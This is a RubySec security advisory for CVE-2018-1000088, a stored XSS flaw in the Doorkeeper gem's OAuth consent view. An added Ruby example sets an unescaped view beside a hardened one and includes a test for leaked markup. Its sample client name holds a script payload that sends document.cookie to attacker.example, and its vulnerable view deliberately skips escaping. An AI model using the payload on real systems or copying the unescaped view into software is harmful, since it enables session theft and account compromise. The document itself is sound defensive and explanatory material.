rubygems / RubySec / RUBY:DOORKEEPER-2018-1000088
Published: Feb 20, 2018, 9:00 p.m.

Doorkeeper gem has stored XSS on authorization consent view

Source: RubySec (rubysec.com)

CVSS2: 4.3 Medium
AV:N/AC:M/Au:N/C:N/I:P/A:N
  Attack Vector: NETWORK
  Attack Complexity: MEDIUM
  Authentication: NONE
  Confidentiality Impact: NONE
  Integrity Impact: PARTIAL
  Availability Impact: NONE

CVSS3: 6.1 Medium
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: REQUIRED
  Scope: CHANGED
  Confidentiality Impact: LOW
  Integrity Impact: LOW
  Availability Impact: NONE

EPSS: 0.001 Low (percentile 50.3%)

Stored XSS in an OAuth client's name causes users who are prompted for
consent via the "implicit" grant type to execute the XSS payload.

The payload runs in the origin of the application hosting Doorkeeper, so it
can gain access to the user's active session there, resulting in account
compromise.

Any user is susceptible if they click the authorization link for the
malicious OAuth client. Because an authorization link identifies the client
only by its client_id, a user cannot tell whether a link is malicious without
first visiting the page that renders the XSS payload.

If third parties are allowed to create OAuth clients in an application using
Doorkeeper, upgrade to the patched versions immediately.

Additionally, there is stored XSS in the native_redirect_uri form element.

DWF has assigned CVE-2018-1000088.
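To make the two issues above concrete, here is an added Ruby example (it is not Doorkeeper's own view code or the fix it shipped): a minimal consent view rendered with the standard-library ERB, first with the stored client name and redirect URI dropped into markup unescaped, then with both escaped for their contexts, together with the authorization link a victim would receive. `ATTACKER_CLIENT`, the `as.example` and `app.example` hosts, the prompt string and the templates are constructed for illustration. Stdlib ERB does not auto-escape `<%= %>` output (Rails' ActionView does, unless a view opts out with `raw` or `html_safe`), so the escaping is explicit.

```ruby
require "erb"
require "uri"

# Constructed sample (not from the advisory): an attacker registers an OAuth client
# whose stored fields carry XSS payloads. Any authorization server that lets third
# parties register clients and later renders those fields faces the same problem.
ATTACKER_CLIENT = {
  client_id:    "abc123",
  name:         %q{Helpful App<script>fetch('//attacker.example/?c='+document.cookie)</script>},
  redirect_uri: %q{https://app.example/cb"><img src=x onerror=alert(1)>},
}.freeze

# The link a victim receives. It identifies the client only by client_id and uses the
# standard implicit-grant parameter response_type=token (RFC 6749), so nothing in the
# URL reveals that the stored client record behind it is poisoned.
def authorization_url(client, base: "https://as.example/oauth/authorize")
  query = URI.encode_www_form(
    client_id:     client[:client_id],
    redirect_uri:  client[:redirect_uri],
    response_type: "token",
    scope:         "read",
  )
  "#{base}?#{query}"
end

# An i18n-style prompt whose placeholder is wrapped in trusted markup. Strings like this
# are typically emitted without further escaping, so whatever is interpolated into them
# must already be safe.
PROMPT = "Authorize %{client_name} to use your account?"

# Vulnerable consent view: the stored name is interpolated into trusted markup unescaped,
# and the stored redirect URI is written into an attribute unescaped. Plain ERB does not
# escape <%= %> output, so this models a view that bypasses framework escaping.
def vulnerable_consent_view(client)
  prompt = PROMPT % { client_name: "<strong>#{client[:name]}</strong>" }
  ERB.new(<<~HTML).result_with_hash(prompt: prompt, client: client)
    <p><%= prompt %></p>
    <form method="post" action="/oauth/authorize">
      <input type="hidden" name="client_id" value="<%= client[:client_id] %>">
      <input type="text" name="redirect_uri" value="<%= client[:redirect_uri] %>">
      <button type="submit">Authorize</button>
    </form>
  HTML
end

# Hardened consent view: every stored client field is escaped before it meets markup,
# in both the element-body context (name) and the attribute context (redirect_uri).
# ERB::Util.html_escape encodes & < > " and ', which covers both contexts here because
# the attributes are double-quoted.
def hardened_consent_view(client)
  safe_name = ERB::Util.html_escape(client[:name])
  prompt = PROMPT % { client_name: "<strong>#{safe_name}</strong>" }
  ERB.new(<<~HTML).result_with_hash(prompt: prompt, client: client)
    <p><%= prompt %></p>
    <form method="post" action="/oauth/authorize">
      <input type="hidden" name="client_id" value="<%= ERB::Util.html_escape(client[:client_id]) %>">
      <input type="text" name="redirect_uri" value="<%= ERB::Util.html_escape(client[:redirect_uri]) %>">
      <button type="submit">Authorize</button>
    </form>
  HTML
end

# Regression check for a view test: render the consent page for the client above and
# fail if a tag from the payload survived as markup (the template itself only emits
# p, form, input, button and strong).
def leaks_payload?(html)
  html.match?(/<(script|img)\b/i)
end

if $PROGRAM_NAME == __FILE__
  puts authorization_url(ATTACKER_CLIENT)
  puts "vulnerable view leaks payload: #{leaks_payload?(vulnerable_consent_view(ATTACKER_CLIENT))}"
  puts "hardened view leaks payload:   #{leaks_payload?(hardened_consent_view(ATTACKER_CLIENT))}"
end
```

Running the file prints the authorization URL and whether each rendering leaks the payload. The URL is the point of the advisory's "a user cannot tell" remark: it is indistinguishable from a legitimate authorize link, and the payload only appears once the server renders the stored client record. A check like `leaks_payload?`, run against a client fixture with hostile fields, belongs in the view tests of any application that lets third parties register OAuth clients.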

Affected products (CPE)
Name        Operator  Version
doorkeeper  lt        2.1.0
doorkeeper  lt        4.2.6
